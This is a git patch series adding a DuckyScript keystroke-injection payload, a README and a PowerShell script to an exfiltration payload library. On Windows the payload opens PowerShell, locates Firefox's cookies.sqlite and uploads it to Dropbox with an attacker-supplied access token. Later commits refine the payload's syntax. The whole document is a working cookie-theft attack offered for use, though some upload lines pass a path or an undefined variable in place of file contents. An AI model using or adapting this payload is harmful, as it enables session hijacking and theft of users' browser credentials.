From 83a25a18bfc38512b4afa0a5a050a63584ff6831 Mon Sep 17 00:00:00 2001 From: Aleff Date: Mon, 12 Jun 2023 12:10:53 +0200 Subject: [PATCH 1/3] Export Firefox Cookies Database --- .../Export_Cookies_From_Firefox/payload.txt | 54 +++++++++++++++++++ 1 file changed, 54 insertions(+) create mode 100644 payloads/library/exfiltration/Export_Cookies_From_Firefox/payload.txt diff --git a/payloads/library/exfiltration/Export_Cookies_From_Firefox/payload.txt b/payloads/library/exfiltration/Export_Cookies_From_Firefox/payload.txt new file mode 100644 index 0000000..3ef6e5c --- /dev/null +++ b/payloads/library/exfiltration/Export_Cookies_From_Firefox/payload.txt @@ -0,0 +1,54 @@ +REM #################################################### +REM # | +REM # Title : Export Firefox Cookies Database | +REM # Author : Aleff | +REM # Version : 1.0 | +REM # Category : Exfiltration | +REM # Target : Windows 10-11 | +REM # | +REM #################################################### + + +REM Requirements: +REM - Firefox must be installed + + +REM You must define your Dropbox accessToken or modify the exfiltration modality. Replace just the example word with your token. +DEFINE DROPBOX_ACCESS_TOKEN "example" + + +DELAY 1000 +GUI r +DELAY 500 +STRING powershell +DELAY 500 +ENTER +DELAY 2000 + + +REM Get cookies DB path +STRINGLN + $firefoxProfilePath = Join-Path -Path $env:APPDATA -ChildPath 'Mozilla\Firefox\Profiles' + $firefoxProfile = Get-ChildItem -Path $firefoxProfilePath | Where-Object {$_.Name -like "*default-release"} + + $filePath = Join-Path -Path $firefoxProfile.FullName -ChildPath 'cookies.sqlite' + +END_STRINGLN + +REM Setting about exfiltration +STRING $accessToken = +STRING DROPBOX_ACCESS_TOKEN +ENTER + +STRINGLN + $uploadUrl = "https://content.dropboxapi.com/2/files/upload" + + $dropboxFilePath = "/cookies_exported.sqlite" + + $headers = @{} + $headers.Add("Authorization", "Bearer $accessToken") + $headers.Add("Dropbox-API-Arg", '{"path":"' + $dropboxFilePath + '","mode":"add","autorename":true,"mute":false}') + $headers.Add("Content-Type", "application/octet-stream") + + Invoke-RestMethod -Uri $uploadUrl -Headers $headers -Method Post -Body $filePath; exit; +END_STRINGLN From 8f689774768f29ae612b3cce33b76242df94d59f Mon Sep 17 00:00:00 2001 From: aleff-github Date: Mon, 12 Jun 2023 12:11:40 +0200 Subject: [PATCH 2/3] readme --- .../Export_Cookies_From_Firefox/README.md | 21 +++++++++++++++++++ .../Export_Cookies_From_Firefox/script.ps1 | 19 +++++++++++++++++ 2 files changed, 40 insertions(+) create mode 100644 payloads/library/exfiltration/Export_Cookies_From_Firefox/README.md create mode 100644 payloads/library/exfiltration/Export_Cookies_From_Firefox/script.ps1 diff --git a/payloads/library/exfiltration/Export_Cookies_From_Firefox/README.md b/payloads/library/exfiltration/Export_Cookies_From_Firefox/README.md new file mode 100644 index 0000000..0b1850e --- /dev/null +++ b/payloads/library/exfiltration/Export_Cookies_From_Firefox/README.md @@ -0,0 +1,21 @@ +# Export Firefox Cookies Database + +This script may come in handy for those who want to quickly save all the cookies of their Firefox session by exporting the database via dropbox accesstoken. + +**Category**: Exfiltration + +## Description + +This script may come in handy for those who want to quickly save all the cookies of their Firefox session by exporting the database via dropbox accesstoken. + +Open a PowerShell, select dynamically the Firefox path adding "cookies.sqlite" at the end, then set your exfiltration settings i.e. Dropbox access token and so on... then export it, then close the powershell. + +## Dependencies + +* Firefox must be installed + +## Settings + +- You must define your Dropbox accessToken or modify the exfiltration modality. Replace just the example word with your token. + +`DEFINE DROPBOX_ACCESS_TOKEN "example"` \ No newline at end of file diff --git a/payloads/library/exfiltration/Export_Cookies_From_Firefox/script.ps1 b/payloads/library/exfiltration/Export_Cookies_From_Firefox/script.ps1 new file mode 100644 index 0000000..1d15a29 --- /dev/null +++ b/payloads/library/exfiltration/Export_Cookies_From_Firefox/script.ps1 @@ -0,0 +1,19 @@ + + +$firefoxProfilePath = Join-Path -Path $env:APPDATA -ChildPath 'Mozilla\Firefox\Profiles' +$firefoxProfile = Get-ChildItem -Path $firefoxProfilePath | Where-Object {$_.Name -like "*default-release"} + +$filePath = Join-Path -Path $firefoxProfile.FullName -ChildPath 'cookies.sqlite' + +$accessToken = "" +$authHeader = @{Authorization = "Bearer $accessToken"} +$dropboxFilePath = "/cookies_exported.sqlite" + +$uploadUrl = "https://content.dropboxapi.com/2/files/upload" + +$headers = @{} +$headers.Add("Authorization", "Bearer $accessToken") +$headers.Add("Dropbox-API-Arg", '{"path":"' + $dropboxFilePath + '","mode":"add","autorename":true,"mute":false}') +$headers.Add("Content-Type", "application/octet-stream") + +Invoke-RestMethod -Uri $uploadUrl -Headers $headers -Method Post -Body $fileContent From 30cf14a1c00937e4c39951164a9158f0a1342594 Mon Sep 17 00:00:00 2001 From: Kalani Helekunihi <324833+kalanihelekunihi@users.noreply.github.com> Date: Mon, 12 Jun 2023 14:29:47 -0400 Subject: [PATCH 3/3] Update payload.txt --- .../Export_Cookies_From_Firefox/payload.txt | 17 +++++------------ 1 file changed, 5 insertions(+), 12 deletions(-) diff --git a/payloads/library/exfiltration/Export_Cookies_From_Firefox/payload.txt b/payloads/library/exfiltration/Export_Cookies_From_Firefox/payload.txt index 3ef6e5c..98bcbaa 100644 --- a/payloads/library/exfiltration/Export_Cookies_From_Firefox/payload.txt +++ b/payloads/library/exfiltration/Export_Cookies_From_Firefox/payload.txt @@ -16,31 +16,24 @@ REM - Firefox must be installed REM You must define your Dropbox accessToken or modify the exfiltration modality. Replace just the example word with your token. DEFINE DROPBOX_ACCESS_TOKEN "example" - -DELAY 1000 +DEFAULT_DELAY 500 GUI r -DELAY 500 -STRING powershell -DELAY 500 -ENTER +STRINGLN powershell DELAY 2000 REM Get cookies DB path -STRINGLN +STRINGLN_BLOCK $firefoxProfilePath = Join-Path -Path $env:APPDATA -ChildPath 'Mozilla\Firefox\Profiles' $firefoxProfile = Get-ChildItem -Path $firefoxProfilePath | Where-Object {$_.Name -like "*default-release"} - $filePath = Join-Path -Path $firefoxProfile.FullName -ChildPath 'cookies.sqlite' - END_STRINGLN REM Setting about exfiltration -STRING $accessToken = -STRING DROPBOX_ACCESS_TOKEN +STRINGLN $accessToken = DROPBOX_ACCESS_TOKEN ENTER -STRINGLN +STRINGLN_BLOCK $uploadUrl = "https://content.dropboxapi.com/2/files/upload" $dropboxFilePath = "/cookies_exported.sqlite"